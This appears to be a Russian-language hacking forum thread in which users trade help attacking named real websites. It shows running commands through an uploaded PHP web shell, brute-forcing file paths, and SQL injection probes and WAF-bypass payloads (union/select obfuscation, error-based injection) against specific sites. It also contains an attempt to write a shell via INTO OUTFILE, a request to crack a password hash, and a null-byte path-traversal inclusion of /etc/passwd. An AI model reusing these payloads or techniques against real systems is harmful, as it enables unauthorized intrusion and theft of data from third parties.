Здрасвуйте! Помогите разобраться, заливаю php файл, на сайт. И он доступен по силке
site/folder//file.php?file=2278 но сразу начинаеться скачивание, а можно сделать так чтоб он отображался на сайте?


Извлечь полный путь до файла из базы данных или сбрутить этот путь.

BigBear said:
Извлечь полный путь до файла из базы данных или сбрутить этот путь.


В базе нашел только это:

r_files:id

r_files:name

r_files:extn

r_files:hashname

r_files:type

r_files:size

r_filesassword

r_files:rid

r_files:hashnews

r_files:visitors

А брутить путь это как?

teh said:
В базе нашел только это:
r_files:id
r_files:name
r_files:extn
r_files:hashname
r_files:type
r_files:size
r_files
assword
r_files:rid
r_files:hashnews
r_files:visitors
А брутить путь это как?


url/files/file.php

url/content/files/files.php

url/img/file.php

и тд и тп до бесконечности

BigBear said:
url/files/file.php
url/content/files/files.php
url/img/file.php
и тд и тп до бесконечности


тыпу file.php это мой файл?

teh said:
тыпу file.php это мой файл?


Файл может переименовываться. Это надо учесть.

BigBear said:
Файл может переименовываться. Это надо учесть.


понял, спасибо

BigBear said:
blank - пустой
Вы вызываете шелл-код с пустыми параметрами.
Как и сказал
faza02
передайте какой-либо аргумент в функцию вызова.


Ну вот я сделал такой запрос localhost/l00k.php?q=1 и выдаёт 1 2 4 5 6 7

Unknowhacker said:
Ну вот я сделал такой запрос localhost/l00k.php?
q=1
и выдаёт
1 2 4 5 6 7


у вас там system. system - выполнение системных команд. что за системная команда 1? передайте ls, wget, cd, pwd, uname, но не 1

Unknowhacker said:
Ну вот я сделал такой запрос localhost/l00k.php?
q=1
и выдаёт
1 2 4 5 6 7


Завязывайте хекать. Это - не ваше.

http://www.hamradio.com/admincp/verify.cfm


Host: www.hamradio.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://www.hamradio.com/admincp/index.cfm?
Cookie: CFID=54197482; CFTOKEN=957af494ba314ff-693DD1BD-0BF9-31D4-303E00DEA9A30085; JSESSIONID=8430defa8ed5f0bc59ad96b27514a6a5f2c1; __utma=76036236.1185247189.1426531794.1426531794.1 426531794.1; __utmb=76036236.8.10.1426531794; __utmc=76036236; __utmz=76036236.1426531794.1.1.utmcsr=(direct)|utm ccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30


POST


username=11111111111111111111111111111111111111111 11111111111111&password=56yth



Можно ли как нибудь проникнуть тут?

И еще один, не выходит раскрутить, непонятно что и как фильтрует. Подскажите.


http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+1=1 - true
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+2=0 - false
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+substr(@@version,1 ,1))=5 - false
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+substr(@@version,1 ,1))=4 - false

Br@!ns said:
И еще один, не выходит раскрутить, непонятно что и как фильтрует. Подскажите.


Бегло осмотрел.

MQ on

Фильтруются запятые, служебные символы типа @

Скобки не фильтруются.

Попробуй функции, которым не нужна запятая в синтаксисе

Типа

http://www.maesen.com/sexshop/ArticulosMini.php?pagina=45+and+49=(select+ascii(( 1)))

Опять же некоторые выборочно фильтруются. Функция Ord например.

Может быть, есть смысл пообходить ваф. Я сейчас не в тех условиях, когда могу генерировать траффик =)

Направление для мыслей дал.

Как обойти сей WAF:


Code:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+order+by+8--

Задержка какая-то если использовать union select.

MaxFast said:
Как обойти сей WAF:

Code:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+order+by+8--

Задержка какая-то если использовать union select.


все стандартно:


Code:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+/*!union*/+select+1,2,3,4,5,version(),7,8--+

error-based:


Code:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+|%28select*from%28select%20name_const%2 8version%28%29,1%29,name_const%28version%28%29,1%2 9%29a%29

главное, чтобы не было union (возможно что-то еще, не смотрел дальше)

faza02 said:
все стандартно:

Code:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+/*!union*/+select+1,2,3,4,5,version(),7,8--+

error-based:

Code:
http://www.szrf.ru/oglavlenie.phtml?nb=edition00&issid=-2015009000+|%28select*from%28select%20name_const%2 8version%28%29,1%29,name_const%28version%28%29,1%2 9%29a%29

главное, чтобы не было union (возможно что-то еще, не смотрел дальше)


То есть задержка из-за union? Странные они. Я даже не подумал.

MaxFast said:
То есть задержка из-за union? Странные они. Я даже не подумал.


реакция на UNION вместе с SELECT. может пройти что-то одно из этого

можно еще так:

union%0Aselect или любым другим пробелом

Всем привет, нужна помощь:

magic_quotes_gpc On On

file priv Y

если захексить кавычку, то она выводится на страницу, без ошибок(Into Outfile + двойной запрос не покатил)

через двойной запрос отображается +and+1=0+union+select+'',777+from+mysql.user+into+ outfile.., а между ковычек отображается к исходном коде, но в файл не записывается.

Есть еще способы залить шелл?

И если у кого есть большой словарь, расшифруйте:

f9fce403c946f20f5b0634d7fffcbbcf

з.ы полный путь естественно есть

криво описал

Jamsho0T said:
Всем привет, нужна помощь:
magic_quotes_gpc
On On
file priv
Y
если захексить кавычку, то она выводится на страницу, без ошибок(Into Outfile + двойной запрос не покатил)
через двойной запрос отображается +and+1=0+union+select+'',777+from+mysql.user+into+ outfile.., а между ковычек

отображается к исходном коде, но в файл не записывается.
Есть еще способы залить шелл?
з.ы полный путь естественно есть
криво описал


чтобы указать путь до файла нужны реальные кавычки в нормальном виде

Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю

Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6

Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6

Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6

подставляю %00 и получаю

Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6

можно что нибудь сделать или уже ничего не вытащить?